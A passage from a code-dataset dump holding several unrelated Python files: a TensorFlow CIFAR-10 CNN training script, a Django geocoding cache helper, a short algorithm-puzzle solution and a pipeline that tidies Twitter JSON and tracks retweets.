tf.app.flags.FLAGS\n\n###################################\n# Basic model parameters.\ntf.app.flags.DEFINE_integer('batch_size', 128,\n \"\"\"Number of images to process in a batch.\"\"\")\ntf.app.flags.DEFINE_string('data_dir', '/tmp/cifar10_data',\n \"\"\"Path to the CIFAR-10 data directory.\"\"\")\ntf.app.flags.DEFINE_boolean('use_fp16', False,\n \"\"\"Train the model using fp16.\"\"\")\ntf.app.flags.DEFINE_boolean('./summary', False,\n \"\"\"Train the model using fp16.\"\"\")\n\n\nTOWER_NAME = 'tower'\n###################################\n### import all the Cifar10 Data ###\n## Read Pickle\ntrain_data = cPickle.load( open( \"cifar10_train.p\", \"rb\" ) )\n#cur_batch = cPickle.load(open (\"cifar10_train_data_batch_1.p\",\"rb\"))\n#next_batch = cPickle.load(open (\"cifar10_train_data_batch_2.p\",\"rb\"))\n#batch_index = 3\ntest_data = cPickle.load( open( \"cifar10_test.p\", \"rb\" ) )\n## Parse to dictionary\ncur_train_images = np.array(train_data['images'])\ncur_train_labels = np.array(train_data['labels'])\n#next_train_images = np.array(next_batch['images'])\n#next_train_labels = np.array(next_batch['labels'])\n\ntest_images = np.array(test_data['images'])\ntest_labels = np.array(test_data['labels'])\ntest_labels2 = np.array(test_data['test_labels'])\n####################################\nlearning_rate = 0.001\ntraining_iters = 8000000\nbatch_size = 128\nbatch_num = 0\nnum_of_epochs = 0\ndropout = 0.89 # Less dropout on input, probability to keep units (after dimention reduction)\ndropout2 = 0.7 # Adding dropout with BN\ndisplay_step = 15\n\n# Small epsilon value for the BN transform\nepsilon = 1e-4\n\nsave_dir = 'checkpoints/'\nsummary_dir = 'summary/'\n\nif not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\nif os.path.exists(summary_dir):\n shutil.rmtree(summary_dir, ignore_errors=False, onerror=None)\n\nsave_path = os.path.join(save_dir, 'cifar10_cnn')\n\n\n#########################\n#### prepare batch data\n#########################\nshuffle_array = np.random.permutation(50000)\n\nnew_t_labels = []\nnew_t_images = []\nfor i in range (0,50000):\n new_t_images.append(cur_train_images[shuffle_array[i]])\n new_t_labels.append(cur_train_labels[shuffle_array[i]])\n\ncur_train_images = new_t_images\ncur_train_labels = new_t_labels\n\nshuffle_array = np.random.permutation(50000)\n\nfor i in range (0,50000):\n new_t_images.append(cur_train_images[shuffle_array[i]])\n new_t_labels.append(cur_train_labels[shuffle_array[i]])\n\nnext_train_images = new_t_images\nnext_train_labels = new_t_labels\n\n############################\n#### Helper Functions\n############################\ndef load_batch():\n print (\"Shuffle new batch, epoch = \",num_of_epochs)\n shuffle_array = np.random.permutation(50000)\n for i in range (0,50000):\n new_t_images.append(cur_train_images[shuffle_array[i]])\n new_t_labels.append(cur_train_labels[shuffle_array[i]])\n\n next_train_images = new_t_images\n next_train_labels = new_t_labels\n\n\ndef variable_summaries(var):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\n\ndef get_next_cifar_batch():\n# shuffle_array = np.random.permutation(250000)\n new_t_images = []\n new_t_labels = []\n\n## Data Augmentation\n\n do_translate = random.random()\n do_rotate = random.random()\n do_image_flip = random.random()\n\n rotate_alpha = random.randint(0,1)\n translateX = random.randint(0,4)\n translateY = random.randint(0,4)\n translateZ = 0\n ranslateZ = 0\n \n\n for i in range (0,128):\n img = cur_train_images[batch_num*128+i]\n label = cur_train_labels[batch_num*128+i]\n\n if do_translate > 0.5:\n img = ndimage.interpolation.shift(img,(translateX,translateY,translateZ))\n elif do_rotate > 0.5:\n img = ndimage.rotate(img,rotate_alpha) [0:32,0:32]\n elif do_image_flip > 0.8:\n img = np.fliplr(img)\n\n new_t_images.append(img)\n new_t_labels.append(label)\n \n #######################\n # images, labels = cur_train_images[batch_num*128:(batch_num+1)*128], cur_train_labels[batch_num*128:(batch_num+1)*128]\n images, labels = new_t_images, new_t_labels\n return images, labels\n\ndef _activation_summary(x):\n\n tensor_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', x.op.name)\n tf.contrib.deprecated.histogram_summary(tensor_name + '/activations', x)\n tf.contrib.deprecated.scalar_summary(tensor_name + '/sparsity',\n tf.nn.zero_fraction(x))\n\ndef _variable_on_cpu(name, shape, initializer):\n\n with tf.device('/cpu:0'):\n dtype = tf.float16 if FLAGS.use_fp16 else tf.float32\n var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)\n return var\n\ndef _variable_with_weight_decay(name, shape, stddev, wd):\n\n dtype = tf.float16 if FLAGS.use_fp16 else tf.float32\n var = _variable_on_cpu(\n name,\n shape,\n tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))\n if wd is not None:\n weight_decay = tf.mul(tf.nn.l2_loss(var), wd, name='weight_loss')\n tf.add_to_collection('losses', weight_decay)\n return var\n\n\n\n\n#############################################################\n############# Implement model\n#############################################################\n\n\ndef conv_net(x, weights1, biases1, keep_prob, keep_prob2):\n### Adding some more tensorflow style image augmentation\n x = tf.image.random_brightness(x, max_delta=63)\n x = tf.image.random_contrast(x, lower=0.2, upper=1.8)\n\n # Subtract off the mean and divide by the variance of the pixels.\n #x = tf.image.per_image_standardization(x)\n \n\n h_drop0 = tf.nn.dropout(x, keep_prob)\n \n with tf.variable_scope('conv1_new') as scope:\n kernel = _variable_with_weight_decay('weights1',\n shape=[3, 3, 3, 96],\n stddev=0.01,\n wd=0.0)\n conv = tf.nn.conv2d(h_drop0, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv1 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv1)\n\n # conv2\n with tf.variable_scope('conv2') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 96, 96],\n stddev=0.01,\n wd=0.00)\n conv = tf.nn.conv2d(conv1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv2 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv2)\n\n with tf.variable_scope('conv2_2') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 96, 96],\n stddev=0.05,\n wd=0.00)\n conv = tf.nn.conv2d(conv2, kernel, [1, 2, 2, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n\n \n batch_mean1, batch_var1 = tf.nn.moments(pre_activation,[0])\n z1_hat = (pre_activation - batch_mean1) / tf.sqrt(batch_var1 + epsilon)\n\n scale1 = tf.Variable(tf.ones([96]))\n beta1 = tf.Variable(tf.zeros([96]))\n BN1 = scale1 * z1_hat + beta1\n\n conv2_2 = tf.nn.relu(BN1, name=scope.name)\n # conv2_2 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv2_2)\n\n \n # norm1\n norm1 = tf.nn.lrn(conv2_2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,\n name='norm1')\n\n\n\n h_drop1 = tf.nn.dropout(norm1, keep_prob2)\n\n with tf.variable_scope('conv3') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 96, 192],\n stddev=0.05,\n wd=0.0)\n conv = tf.nn.conv2d(h_drop1, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv3 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv3)\n\n\n with tf.variable_scope('conv4') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 192, 192],\n stddev=0.025,\n wd=0.0)\n conv = tf.nn.conv2d(conv3, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv4 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv4)\n\n with tf.variable_scope('conv4_2') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 192, 192],\n stddev=0.0125,\n wd=0.0)\n conv = tf.nn.conv2d(conv4, kernel, [1, 2, 2, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n\n batch_mean2, batch_var2 = tf.nn.moments(pre_activation,[0])\n z2_hat = (pre_activation - batch_mean2) / tf.sqrt(batch_var2 + epsilon)\n\n scale1 = tf.Variable(tf.ones([192]))\n beta1 = tf.Variable(tf.zeros([192]))\n BN2 = scale1 * z2_hat + beta1\n\n conv4_2 = tf.nn.relu(BN2, name=scope.name)\n # conv4_2 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv4_2)\n\n # norm1\n norm2 = tf.nn.lrn(conv4_2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,\n name='norm1')\n\n\n h_drop2 = tf.nn.dropout(norm2, keep_prob2)\n\n with tf.variable_scope('conv5') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[3, 3, 192, 192],\n stddev=0.05,\n wd=0.0)\n conv = tf.nn.conv2d(h_drop2, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv5 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv5)\n\n with tf.variable_scope('conv6') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[1, 1, 192, 192],\n stddev=0.025,\n wd=0.0)\n conv = tf.nn.conv2d(conv5, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv6 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv6)\n\n\n with tf.variable_scope('conv7') as scope:\n kernel = _variable_with_weight_decay('weights',\n shape=[1, 1, 192, 10],\n stddev=0.0125,\n wd=0.0)\n conv = tf.nn.conv2d(conv6, kernel, [1, 1, 1, 1], padding='SAME')\n biases = tf.Variable(tf.constant(0.0, shape=[10], dtype=tf.float32),\n trainable=True, name='biases')\n pre_activation = tf.nn.bias_add(conv, biases)\n conv7 = tf.nn.relu(pre_activation, name=scope.name)\n variable_summaries(kernel)\n _activation_summary(conv7)\n\n avg1 = tf.nn.avg_pool(conv7, ksize=[1, 6, 6, 1],\n strides=[1, 1, 1, 1], padding='SAME', name='avg1')\n\n\n with tf.variable_scope('softmax_linear') as scope:\n reshape = tf.reshape(avg1, [FLAGS.batch_size, -1])\n dim = reshape.get_shape()[1].value\n weights = _variable_with_weight_decay('weights', shape=[dim, 10],\n stddev=0.05, wd=0.0)\n biases = tf.Variable(tf.constant(0.0, shape=[10], dtype=tf.float32),\n trainable=True, name='biases')\n softmax_linear = tf.add(tf.matmul(reshape, weights), biases, name=scope.name)\n variable_summaries(weights)\n _activation_summary(softmax_linear)\n\n return softmax_linear\n\n\n#####################################\n### tf Graph input (Place holders)\n#####################################\nx = tf.placeholder(tf.float32, shape = (128,32,32,3) )\ny = tf.placeholder(tf.float32, [None, 10])\nkeep_prob = tf.placeholder(tf.float32) #dropout (keep probability)\nkeep_prob2 = tf.placeholder(tf.float32) #dropout (keep probability)\nglobal_step = tf.Variable(initial_value=0,name='global_step', trainable=False)\n\n# Construct model\npred = conv_net(x, 1, 1, keep_prob, keep_prob2)\n\n\n\n# Define loss and optimizer\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost,global_step=global_step)\n#optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate,momentum=0.9).minimize(cost,global_step=global_step)\n\n# Evaluate model\ncorrect_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n# Initializing the variables\n\n# Create a session\nsession = tf.Session()\n\n# Create a Saver\nsaver = tf.train.Saver()\n\n# Write for tensorboard\nwith tf.name_scope('cross_entropy'):\n with tf.name_scope('total'):\n cross_entropy = tf.reduce_mean(cost)\n\n\ntf.summary.scalar('cross_entropy', cross_entropy)\ntf.summary.scalar('learning_rate', learning_rate)\nmerged = tf.summary.merge_all() \ntrain_writer = tf.summary.FileWriter('summary/train',\n session.graph)\n\n# Embedding\n#embedding_var = tf.Variable(tf.float32, shape = (32,32))\n\ntry:\n print(\"Trying to restore last checkpoint ...\")\n\n # Use TensorFlow to find the latest checkpoint - if any.\n last_chk_path = tf.train.latest_checkpoint(checkpoint_dir=save_dir)\n\n # Try and load the data in the checkpoint.\n saver.restore(session, save_path=last_chk_path)\n\n # If we get to this point, the checkpoint was successfully loaded.\n print(\"Restored checkpoint from:\", last_chk_path)\nexcept:\n # If the above failed for some reason, simply\n # initialize all the variables for the TensorFlow graph.\n print(\"Failed to restore checkpoint. Initializing variables instead.\")\n session.run(tf.global_variables_initializer())\n\n\n\n######################################\n#### Launch the graph\n######################################\n#with tf.Session() as sess:\n#sess.run(init)\nstep = 1\n\n# Keep training until reach max iterations\nwhile step * batch_size < training_iters:\n batch_x, batch_y = get_next_cifar_batch()\n\n # Run optimization op (backprop)\n i_global, _ = session.run([global_step, optimizer], feed_dict={x: batch_x, y: batch_y,\n keep_prob: dropout,\n keep_prob2: dropout2})\n\n if step % 370 == 0:\n sum = 0\n for num in range(0, 70):\n # print(num)\n test = session.run(accuracy, feed_dict={x: test_images[num * 128:128 + num * 128],\n y: test_labels[num * 128:128 + num * 128],\n keep_prob: 1.,\n keep_prob2: 1.})\n\n\n sum += test\n \n print (\"Test accuracy = \", sum/70)\n print (\"Ran number of epochs\",num_of_epochs)\n \n batch_num = 0\n num_of_epochs += 1\n cur_train_images = next_train_images\n cur_train_labels = next_train_labels\n p = Process(target=load_batch, args=())\n p.start()\n #batch_index += 1\n # if batch_index == 6:\n # batch_index = 1\n if step % display_step == 0:\n # Calculate batch loss and accuracy\n summary, loss, acc = session.run([merged, cost, accuracy], feed_dict={x: batch_x,\n y: batch_y,\n keep_prob: 1.,\n keep_prob2: 1.})\n\n print(\"Iter \" + str(step*batch_size) + \", Minibatch Loss= \" + \\\n \"{:.6f}\".format(loss) + \", Training Accuracy= \" + \\\n \"{:.5f}\".format(acc))\n train_writer.add_summary(summary, i_global)\n\n step += 1\n batch_num += 1\n\n# if step % 7000 == 0:\n# learning_rate /= 10\n\n # Save a checkpoint to disk every 1000 iterations (and last).\n if (i_global % 5000 == 0) or (step*batch_size == training_iters - 1):\n # Save all variables of the TensorFlow graph to a\n # checkpoint. Append the global_step counter\n # to the filename so we save the last several checkpoints.\n saver.save(session,\n save_path=save_path,\n global_step=global_step)\n\n print(\"Saved checkpoint.\")\n\nprint(\"Optimization Finished!\")\n\nsum = 0\n\nfor num in range(0, 70):\n # print(num)\n test = session.run(accuracy, feed_dict={x: test_images[num * 128:128 + num * 128],\n y: test_labels[num * 128:128 + num * 128],\n keep_prob: 1.,\n keep_prob2: 1.})\n\n\n sum += test\n\nprint (\"Test accuracy = \", sum/70)\nprint (\"Ran number of epochs\",num_of_epochs)\n\n#saver.save(sess,'model')\n\n\n#######################\n## Confusion Matrix\n#######################\n\nconfusion = np.zeros([10, 10], float)\nprediction = tf.argmax(pred, 1)\n\nfor num in range(0, 70):\n labels = session.run(prediction, feed_dict={x: test_images[num * 128:128 + num * 128],\n y: test_labels[num * 128:128 + num * 128],\n keep_prob: 1.,\n keep_prob2: 1.})\n\n mytest_labels = test_labels2[num * 128:128 + num * 128]\n \n for i in range(0, 128):\n confusion[mytest_labels[i]][labels[i]] += 1\n\nconfusion = confusion / confusion.sum(axis=0)\n\n\nplt.matshow(confusion)\nplt.title('Confusion matrix')\nplt.colorbar()\nplt.ylabel('True label')\nplt.xlabel('Predicted label')\nplt.show()\n\n\n","sub_path":"cifar10_1_all_cnn_C_regularization_e.py","file_name":"cifar10_1_all_cnn_C_regularization_e.py","file_ext":"py","file_size_in_byte":19943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"621493474","text":"from geopy.geocoders import Nominatim\nfrom geopy.geocoders import GoogleV3\nfrom geopy.exc import GeocoderQuotaExceeded\nfrom .models import Cache\nfrom django.core.exceptions import ObjectDoesNotExist\n# return tp (v_addr- raw address, lat, lng)\n\nclass tp(object):\n\tdef __init__(self, viezd):\n\t\tsuper(tp, self).__init__()\n\t\tself.viezd = viezd\n\t\t#self.geolocator = Nominatim()\n\t\tself.geolocator = GoogleV3()\n\t\tself.geolocator_Nom = Nominatim()\n\t\tself.v_addr=viezd.address\n\n\n\t\t#if v in cache return cord\n\t\ttry:\n\t\t\tv_from_c=Cache.objects.get(address=self.v_addr)\n\t\t\tself.lat=v_from_c.lat\n\t\t\tself.lng=v_from_c.lng\n\n\t\texcept ObjectDoesNotExist:\n\n\t\t#else use geopy and add cord to cache\n\t\t\ttry:\n\t\t\t\tself.v_gps = self.geolocator.geocode(self.v_addr)\n\t\t\texcept:\n\t\t\t\tself.v_gps = self.geolocator_Nom.geocode(self.v_addr)\n\t\t\n\t\t\tself.lat=self.v_gps.latitude\n\t\t\tself.lng=self.v_gps.longitude\n\t\t\tv_to_c= Cache(address=self.v_addr, lat=self.lat, lng=self.lng)\n\t\t\tv_to_c.save()\n\t\n\n\n\t\t","sub_path":"cyfra_logistic/gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"366147979","text":"# Problem [2669] : 직사각형 네개의 합집합의 면적 구하기\n# 입력은 네 줄, 각 줄은 직사각형의 위치를 나타내는 네 개의 정수로 주어진다.\n# 입력 = x1 y1 x2 y2\n# 모든 좌표는 1이상 100이하의 정수이다.\n\n\nmatrix = [[0 for _ in range(101)] for _ in range(101)]\nresult = 0\nfor _ in range(4) :\n x1, y1, x2, y2 = map(int,input().split())\n for x in range(x1,x2) :\n for y in range(y1,y2) :\n if matrix[x][y] != 1 :\n matrix[x][y] = 1\n result += 1 \nprint(result)","sub_path":"Baekjoon/Olympiad/BOJ_2669.py","file_name":"BOJ_2669.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"258739355","text":"import pandas as pd\nimport json\nimport time\nimport os\nimport datetime as dt\nimport re\nimport wget\n \ndef tidy_tweets(file_name):\n '''Converts json raw tweets into tidy df'''\n\n ### This is to look for unattributed retweets\n seed_tweets_dict, screen_name_dict = {}, {}\n if \"seed_tweets.csv\" in os.listdir('data/processed/seed_tweets/'):\n seed_tweets = pd.read_csv('data/processed/seed_tweets/seed_tweets.csv')\n for idx, row in seed_tweets.iterrows():\n seed_tweets_dict[row['text']] = [row['screen_name'], row['id'], row['user_id']]\n screen_name_dict[row['screen_name']] = row['id']\n \n id_list, datetime_list, screen_name_list, user_id_list, text_list = [], [], [], [], []\n in_reply_to_user_id_list, in_reply_to_status_id_list, in_reply_to_screen_name_list = [], [], []\n rt_screen_name_list, rt_user_id_list, rt_id_list, rt_type_list = [], [], [], []\n qt_screen_name_list, qt_id_list, qt_status_list = [], [], []\n mentions_list, hashtags_list = [], []\n photos_list, videos_list, gifs_list = [], [], []\n urls_list, trunc_url_list = [], []\n \n with open(file_name) as json_data:\n for idx, tweet in enumerate(json_data):\n \n try:\n tweet = json.loads(tweet)\n except:\n print('could not open line ',idx)\n continue\n\n id_list.append(\"id_\" + str(tweet['id']))\n screen_name_list.append(tweet[\"user\"]['screen_name'])\n user_id_list.append(\"id_\" + str(tweet[\"user\"]['id']))\n\n rp_user_id = \"id_\" + str(tweet[\"in_reply_to_user_id\"])\n rp_screen_name = tweet[\"in_reply_to_screen_name\"]\n rp_status = \"id_\" + str(tweet[\"in_reply_to_status_id\"]) if tweet[\"in_reply_to_status_id\"] is not None else None\n\n t = time.strftime('%Y-%m-%d %H:%M:%S', time.strptime(tweet['created_at'],'%a %b %d %H:%M:%S +0000 %Y'))\n datetime_list.append(t)\n\n text = tweet['text'] if \"text\" in tweet else tweet['full_text']\n\n rt_screen_name, rt_user_id, rt_id, rt_type = None, None, None, None\n qt_id, qt_screen_name, qt_status = None, None, None\n\n mentions = set([x['screen_name'] for x in tweet['entities']['user_mentions']])\n\n if 'retweeted_status' in tweet: # It is a retweet\n text = tweet['retweeted_status']['text'] if 'text' in tweet['retweeted_status'] else tweet['retweeted_status']['full_text']\n try:\n text = tweet['retweeted_status']['extended_tweet']['full_text']\n mentions = set([x['screen_name'] for x in tweet['retweeted_status']['extended_tweet']['entities']['user_mentions']])\n except:\n pass\n rt_screen_name = tweet['retweeted_status']['user']['screen_name']\n rt_user_id = \"id_\" + str(tweet['retweeted_status']['user']['id'])\n rt_id = \"id_\" + str(tweet['retweeted_status']['id'])\n rt_type = 'official'\n \n if 'quoted_status' in tweet: # In reply to tweet data\n qt_id = \"id_\" + str(tweet[\"quoted_status\"][\"user\"][\"id\"])\n qt_screen_name = tweet[\"quoted_status\"][\"user\"][\"screen_name\"]\n qt_status = tweet[\"quoted_status\"][\"text\"] if 'text' in tweet['quoted_status'] else tweet['quoted_status']['full_text']\n try:\n qt_status = tweet[\"quoted_status\"][\"extended_tweet\"]['full_text']\n except:\n pass\n\n if 'extended_tweet' in tweet:\n text = tweet['extended_tweet']['full_text']\n mentions = set([x['screen_name'] for x in tweet['extended_tweet']['entities']['user_mentions']])\n \n # Look for unofficial retweets\n if rt_screen_name is None and re.search(r'^(RT|Rt|rt|retweet)(?:\\b\\W*@(\\w+)) (.*)', text):\n rt_screen_name = re.search(r'^(RT|Rt|rt|retweet)(?:\\b\\W*@(\\w+)) (.*)', text)[2]\n rt_type = 'unofficial accredited'\n if re.search(r'^(RT|Rt|rt|retweet)(?:\\b\\W*@(\\w+)) (.*)', text)[3] in seed_tweets_dict:\n rt_id = seed_tweets_dict[text][1]\n rt_user_id = seed_tweets_dict[text][2]\n \n # Look for unnoficial uncredited retweets\n if rt_screen_name is None and text in seed_tweets_dict:\n rt_screen_name = seed_tweets_dict[text][0]\n rt_id = seed_tweets_dict[text][1]\n rt_user_id = seed_tweets_dict[text][2]\n rt_type = 'unofficial unaccredited'\n\n text_list.append(text)\n in_reply_to_status_id_list.append(rp_status)\n in_reply_to_user_id_list.append(rp_user_id)\n in_reply_to_screen_name_list.append(rp_screen_name)\n rt_screen_name_list.append(rt_screen_name)\n rt_user_id_list.append(rt_user_id)\n rt_id_list.append(rt_id)\n rt_type_list.append(rt_type)\n qt_id_list.append(qt_id)\n qt_screen_name_list.append(qt_screen_name)\n qt_status_list.append(qt_status)\n mentions_list.append(\", \".join(list(mentions)))\n\n photo, video, gif = [], [], []\n if \"media\" in tweet['entities']:\n for media in tweet['extended_entities']['media']:\n if media['type'] == 'photo':\n photo.append(media['media_url'])\n elif media['type'] == 'video':\n video.append(media['video_info']['variants'][0]['url'])\n elif media['type'] == 'animated_gif':\n gif.append(media['video_info']['variants'][0]['url'])\n \n photos_list.append(\", \".join(photo))\n videos_list.append(\", \".join(video))\n gifs_list.append(\", \".join(gif))\n\n if len(tweet['entities']['urls']) > 0:\n if \"extended_tweet\" in tweet:\n url = [item['expanded_url'] for item in tweet['extended_tweet']['entities']['urls']]\n else:\n url = [item['expanded_url'] for item in tweet['entities']['urls']]\n \n urls_list.append(\", \".join(url))\n trunc_url_list.append(\", \".join([re.search('://(www.)?([a-zA-Z0-9.-]+)',x).group(2) for x in url]))\n \n else:\n urls_list.append(\"\")\n trunc_url_list.append(\"\")\n\n if len(tweet['entities']['hashtags']) > 0 :\n hashtags_list.append(\n \", \".join([item['text'] for item in tweet['entities']['hashtags']]))\n else:\n hashtags_list.append(\"\")\n\n\n data = pd.DataFrame({\n \"id\" : id_list,\n \"screen_name\": screen_name_list,\n \"user_id\": user_id_list,\n \"text\": text_list,\n \"rt_from_screen_name\": rt_screen_name_list,\n \"rt_from_user_id\": rt_user_id_list,\n \"rt_from_id\": rt_id_list,\n \"qt_from_screen_name\": qt_screen_name_list,\n 'qt_status': qt_status_list,\n \"in_reply_to_screen_name\": in_reply_to_screen_name_list,\n \"in_reply_to_status_id\": in_reply_to_status_id_list,\n \"mentions\": mentions_list,\n \"datetime\":datetime_list,\n \"rt_type\": rt_type_list,\n \"url\":urls_list,\n \"trunc_url\":trunc_url_list,\n \"hashtags\":hashtags_list,\n \"photos\":photos_list,\n \"videos\":videos_list,\n \"gifs\":gifs_list})\n\n return data\n\nclass process_tweets():\n def __init__(self, day_to_process):\n self.day_to_process = day_to_process\n\n print(\"> tidy stream\")\n self.tweets = tidy_tweets('data/raw/stream_tweets_{}.json'.format(day_to_process))\n print(\">> extract seed\")\n self.extract_seed_tweets(get_media=True)\n \n print(\">> extract retweets\")\n self.extract_seed_retweets()\n \n print(\">> get id values\")\n tweets_ids = self.tweets.id.values\n del self.tweets\n \n print(\"> tidy rest\")\n self.tweets = tidy_tweets('data/raw/rest_tweets_{}.json'.format(day_to_process))\n print(\">> filtering tweets not in stream\")\n self.tweets = self.tweets[~self.tweets.id.isin(tweets_ids)]\n print(\">> extract seed\")\n self.extract_seed_tweets(get_media=True)\n\n print(\">> extact_retweets\")\n self.extract_seed_retweets()\n del self.tweets\n\n self.unify_daily_followers_list()\n \n \n \n def extract_seed_tweets(self, get_media=False):\n '''\n Filters influencer tweets \n input: raw json files\n output: \n - seed_tweets.csv\n - seed_tweet_ids.csv (to track future retweets)\n '''\n print(\">>> Extracting seed tweets df, saving to data/processed/seed_tweets/seed_tweets_.csv\")\n \n seed_tweets = self.tweets[(self.tweets.user_id.isin(user_ids))].drop_duplicates('id')\n\n self.len_new_tweets = len(seed_tweets)\n if get_media:\n print('getting media')\n for idx, row in seed_tweets.iterrows():\n\n if len(row['photos']) > 0:\n for photo in row['photos'].split(\", \"):\n try:\n wget.download(photo, \"data/processed/media_by_tweet/{}.jpg\".format(row['id']))\n except Exception as e:\n pass\n\n if len(row['videos']) > 0:\n for video in row['videos'].split(\", \"):\n try:\n wget.download(video, \"data/processed/media_by_tweet/{}.mp4\".format(row['id']))\n except Exception as e:\n pass\n\n if len(row['gifs']) > 0:\n for gif in row['gifs'].split(\", \"):\n try:\n wget.download(gif, \"data/processed/media_by_tweet/{}.mp4\".format(row['id']))\n except Exception as e:\n pass\n\n # Write full dataframe\n if not os.path.isfile(\"data/processed/seed_tweets/seed_tweets_{}.csv\".format(time.strftime(\"%y%W\"))):\n seed_tweets.to_csv('data/processed/seed_tweets/seed_tweets_{}.csv'.format(time.strftime(\"%y%W\")), index=False)\n else:\n seed_tweets.to_csv('data/processed/seed_tweets/seed_tweets_{}.csv'.format(time.strftime(\"%y%W\")), index=False, header=False, mode='a')\n \n print(\">>> Extracting seed tweets_id list, saving to data/seed_tweets_ids.csv\")\n # Keep a list of seed tweets ids\n with open('data/processed/seed_tweets_ids.csv', 'a') as f: \n for tweet_id in seed_tweets.id.values:\n f.write(\"%s\\n\" % tweet_id)\n \n def extract_seed_retweets(self):\n '''\n Extracts engagement with influencer tweets. Separates all from candace owens and charlie kirk\n for processing purposes. \n\n input: all tidy tweets\n output: \n - retweets.csv\n - retweets_cc.csv (candace owens and charlie kirk)\n '''\n print(\">>> Extracting engagement from seeds df, saving to data/processed/engagement/engagement.csv\")\n with open('data/processed/seed_tweets_ids.csv') as file:\n ids = file.read().splitlines()\n \n # Filtering out candace and charlie's retweets\n \n seed_retweets = self.tweets[ self.tweets.rt_from_screen_name.isin(screen_names_rest) | ### retweet\n (\n (self.tweets.rt_from_id.isna()) &\n (self.tweets.in_reply_to_screen_name.isin(screen_names_rest) &\n (self.tweets.in_reply_to_status_id.notna()))) | ### reply\n (\n (self.tweets.rt_from_id.isna()) &\n (self.tweets.qt_from_screen_name.isin(screen_names_rest))) ### quote\n ]\n \n print('finish filtering')\n if not os.path.isfile('data/processed/seed_retweets/retweets_from_seeds_{}.csv'.format(time.strftime(\"%y%W\"))):\n seed_retweets.to_csv(\"data/processed/seed_retweets/retweets_from_seeds_{}.csv\".format(time.strftime(\"%y%W\")), index=False)\n else:\n seed_retweets.to_csv(\"data/processed/seed_retweets/retweets_from_seeds_{}.csv\".format(time.strftime(\"%y%W\")), index=False, header=False, mode='a')\n \n \n print(\">>> Extracting retweeters screen_name and id, saving to data/retweeters_users.csv\")\n if 'retweeters_users.csv' in os.listdir('data/processed/'):\n current_retweeters = pd.read_csv('data/processed/retweeters_users.csv')[[\"screen_name\",\"user_id\"]]\n new_retweeters = seed_retweets[~seed_retweets.user_id.isin(current_retweeters.user_id)][[\"screen_name\",\"user_id\"]]\n new_retweeters = new_retweeters.drop_duplicates()\n else:\n new_retweeters = 